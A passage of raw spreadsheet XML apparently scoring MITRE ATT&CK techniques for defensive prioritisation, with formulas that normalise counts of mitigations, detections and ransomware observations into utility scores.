        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K421">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L421">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M421" s="25">
        <v>0</v>
      </c>
      <c r="N421" s="51">
        <v>0</v>
      </c>
      <c r="O421" s="51">
        <v>0</v>
      </c>
      <c r="P421" s="51">
        <v>1</v>
      </c>
      <c r="Q421" s="51">
        <v>5</v>
      </c>
      <c r="R421" s="51"/>
      <c r="S421" s="51">
        <v>0</v>
      </c>
      <c r="T421" s="51"/>
      <c r="U421" s="51">
        <v>0</v>
      </c>
      <c r="V421" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W421">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X421">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y421">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z421">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA421">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB421">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC421" s="29" t="s">
        <v>1607</v>
      </c>
      <c r="AD421" s="25" t="str" cm="1">
        <f t="array" ref="AD421">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC421)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE421" s="25">
        <f>IF(AD421="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF421" s="25" t="str" cm="1">
        <f t="array" ref="AF421">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC421)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG421" s="25">
        <f>IF(AF421="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH421" s="25" t="str" cm="1">
        <f t="array" ref="AH421">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC421)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI421" s="25">
        <f>IF(AH421="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ421" s="25" t="str" cm="1">
        <f t="array" ref="AJ421">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC421)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK421" s="25">
        <f>IF(AJ421="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL421" s="25" t="str" cm="1">
        <f t="array" ref="AL421">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC421)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM421" s="25">
        <f>IF(AL421="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN421" s="60">
        <v>0</v>
      </c>
      <c r="AO421" s="51">
        <v>0</v>
      </c>
      <c r="AP421" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.540285714285714E-2</v>
      </c>
      <c r="AQ421" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.1342857142857135E-2</v>
      </c>
      <c r="AR421" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.1342857142857135E-2</v>
      </c>
      <c r="AS421" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT421" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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22" spans="1:47">
      <c r="A422" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1190476190476194E-2</v>
      </c>
      <c r="B422" s="25">
        <f>SUM(H422,M422,V422)*(1+SUM(AE422,AG422,AI422,AK422,AM422))</f>
        <v>7.857142857142857E-2</v>
      </c>
      <c r="C422" s="25" t="s">
        <v>1608</v>
      </c>
      <c r="D422" s="25" t="s">
        <v>1609</v>
      </c>
      <c r="E422" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F422" s="51">
        <v>0</v>
      </c>
      <c r="G422" s="51">
        <v>1</v>
      </c>
      <c r="H422" s="35">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I422">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J422">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K422">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L422">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M422" s="25">
        <v>0</v>
      </c>
      <c r="N422" s="51">
        <v>0</v>
      </c>
      <c r="O422" s="51">
        <v>1</v>
      </c>
      <c r="P422" s="51">
        <v>0</v>
      </c>
      <c r="Q422" s="51">
        <v>5</v>
      </c>
      <c r="R422" s="51"/>
      <c r="S422" s="51">
        <v>0</v>
      </c>
      <c r="T422" s="51"/>
      <c r="U422" s="51">
        <v>0</v>
      </c>
      <c r="V422" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W422">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X422">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y422">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z422">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA422">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB422">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC422" s="29"/>
      <c r="AD422" s="25" t="str" cm="1">
        <f t="array" ref="AD422">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC422)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE422" s="25">
        <f>IF(AD422="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF422" s="25" t="str" cm="1">
        <f t="array" ref="AF422">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC422)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG422" s="25">
        <f>IF(AF422="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH422" s="25" t="str" cm="1">
        <f t="array" ref="AH422">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC422)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI422" s="25">
        <f>IF(AH422="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ422" s="25" t="str" cm="1">
        <f t="array" ref="AJ422">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC422)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK422" s="25">
        <f>IF(AJ422="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL422" s="25" t="str" cm="1">
        <f t="array" ref="AL422">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC422)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM422" s="25">
        <f>IF(AL422="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN422" s="52">
        <v>1</v>
      </c>
      <c r="AO422" s="51">
        <v>1</v>
      </c>
      <c r="AP422" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1190476190476194E-2</v>
      </c>
      <c r="AQ422" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.6190476190476191E-2</v>
      </c>
      <c r="AR422" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.6190476190476191E-2</v>
      </c>
      <c r="AS422" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT422" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU42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23" spans="1:47" ht="48">
      <c r="A423" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.3552380952380961E-3</v>
      </c>
      <c r="B423" s="25">
        <f>SUM(H423,M423,V423)*(1+SUM(AE423,AG423,AI423,AK423,AM423))</f>
        <v>8.3552380952380961E-2</v>
      </c>
      <c r="C423" s="25" t="s">
        <v>1610</v>
      </c>
      <c r="D423" s="25" t="s">
        <v>1596</v>
      </c>
      <c r="E423" s="25" t="s">
        <v>1611</v>
      </c>
      <c r="F423" s="51">
        <v>0</v>
      </c>
      <c r="G423" s="51">
        <v>1</v>
      </c>
      <c r="H423" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I423">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J423">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K423">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L423">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M423" s="25">
        <v>0</v>
      </c>
      <c r="N423" s="51">
        <v>0</v>
      </c>
      <c r="O423" s="51">
        <v>0</v>
      </c>
      <c r="P423" s="51">
        <v>0</v>
      </c>
      <c r="Q423" s="51">
        <v>1</v>
      </c>
      <c r="R423" s="52" t="s">
        <v>1594</v>
      </c>
      <c r="S423" s="51">
        <v>2</v>
      </c>
      <c r="T423" s="51"/>
      <c r="U423" s="51">
        <v>0</v>
      </c>
      <c r="V423" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523812E-2</v>
      </c>
      <c r="W423">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>2</v>
      </c>
      <c r="X423">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Y423">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Z423">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA423">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB423">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC423" s="29" t="s">
        <v>938</v>
      </c>
      <c r="AD423" s="25" t="str" cm="1">
        <f t="array" ref="AD423">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC423)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE423" s="25">
        <f>IF(AD423="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF423" s="25" t="str" cm="1">
        <f t="array" ref="AF423">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC423)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG423" s="25">
        <f>IF(AF423="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH423" s="25" t="str" cm="1">
        <f t="array" ref="AH423">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC423)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI423" s="25">
        <f>IF(AH423="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ423" s="25" t="str" cm="1">
        <f t="array" ref="AJ423">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC423)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK423" s="25">
        <f>IF(AJ423="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL423" s="25" t="str" cm="1">
        <f t="array" ref="AL423">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC423)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM423" s="25">
        <f>IF(AL423="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN423" s="60">
        <v>0</v>
      </c>
      <c r="AO423" s="51">
        <v>0</v>
      </c>
      <c r="AP423" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.3552380952380961E-3</v>
      </c>
      <c r="AQ423" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.7850793650793654E-2</v>
      </c>
      <c r="AR423" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.7850793650793654E-2</v>
      </c>
      <c r="AS423" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT423" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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24" spans="1:47">
      <c r="A424" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.3809523809523804E-3</v>
      </c>
      <c r="B424" s="25">
        <f>SUM(H424,M424,V424)*(1+SUM(AE424,AG424,AI424,AK424,AM424))</f>
        <v>7.3809523809523811E-2</v>
      </c>
      <c r="C424" s="25" t="s">
        <v>1612</v>
      </c>
      <c r="D424" s="25" t="s">
        <v>1593</v>
      </c>
      <c r="E424" s="25" t="s">
        <v>1613</v>
      </c>
      <c r="F424" s="51">
        <v>0</v>
      </c>
      <c r="G424" s="51">
        <v>1</v>
      </c>
      <c r="H424" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I424">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J424">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K424">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L424">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M424" s="25">
        <v>0</v>
      </c>
      <c r="N424" s="51">
        <v>0</v>
      </c>
      <c r="O424" s="51">
        <v>0</v>
      </c>
      <c r="P424" s="51">
        <v>0</v>
      </c>
      <c r="Q424" s="51">
        <v>1</v>
      </c>
      <c r="R424" s="52" t="s">
        <v>1594</v>
      </c>
      <c r="S424" s="51">
        <v>2</v>
      </c>
      <c r="T424" s="51"/>
      <c r="U424" s="51">
        <v>0</v>
      </c>
      <c r="V424" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523812E-2</v>
      </c>
      <c r="W424">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>2</v>
      </c>
      <c r="X424">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Y424">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Z424">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA424">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB424">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC424" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD424" s="25" t="str" cm="1">
        <f t="array" ref="AD424">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC424)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE424" s="25">
        <f>IF(AD424="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF424" s="25" t="str" cm="1">
        <f t="array" ref="AF424">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC424)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG424" s="25">
        <f>IF(AF424="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH424" s="25" t="str" cm="1">
        <f t="array" ref="AH424">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC424)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI424" s="25">
        <f>IF(AH424="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ424" s="25" t="str" cm="1">
        <f t="array" ref="AJ424">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC424)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK424" s="25">
        <f>IF(AJ424="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL424" s="25" t="str" cm="1">
        <f t="array" ref="AL424">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC424)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM424" s="25">
        <f>IF(AL424="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN424" s="60">
        <v>0</v>
      </c>
      <c r="AO424" s="51">
        <v>0</v>
      </c>
      <c r="AP424" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.3809523809523804E-3</v>
      </c>
      <c r="AQ424" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.4603174603174603E-2</v>
      </c>
      <c r="AR424" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.4603174603174603E-2</v>
      </c>
      <c r="AS424" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT424" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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25" spans="1:47">
      <c r="A425" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.3809523809523804E-3</v>
      </c>
      <c r="B425" s="25">
        <f>SUM(H425,M425,V425)*(1+SUM(AE425,AG425,AI425,AK425,AM425))</f>
        <v>7.3809523809523811E-2</v>
      </c>
      <c r="C425" s="25" t="s">
        <v>1614</v>
      </c>
      <c r="D425" s="25" t="s">
        <v>1593</v>
      </c>
      <c r="E425" s="25" t="s">
        <v>1615</v>
      </c>
      <c r="F425" s="51">
        <v>0</v>
      </c>
      <c r="G425" s="51">
        <v>1</v>
      </c>
      <c r="H425" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I425">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J425">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K425">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L425">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M425" s="25">
        <v>0</v>
      </c>
      <c r="N425" s="51">
        <v>0</v>
      </c>
      <c r="O425" s="51">
        <v>0</v>
      </c>
      <c r="P425" s="51">
        <v>0</v>
      </c>
      <c r="Q425" s="51">
        <v>1</v>
      </c>
      <c r="R425" s="52" t="s">
        <v>1594</v>
      </c>
      <c r="S425" s="51">
        <v>2</v>
      </c>
      <c r="T425" s="51"/>
      <c r="U425" s="51">
        <v>0</v>
      </c>
      <c r="V425" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523812E-2</v>
      </c>
      <c r="W425">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>2</v>
      </c>
      <c r="X425">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Y425">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Z425">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA425">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB425">
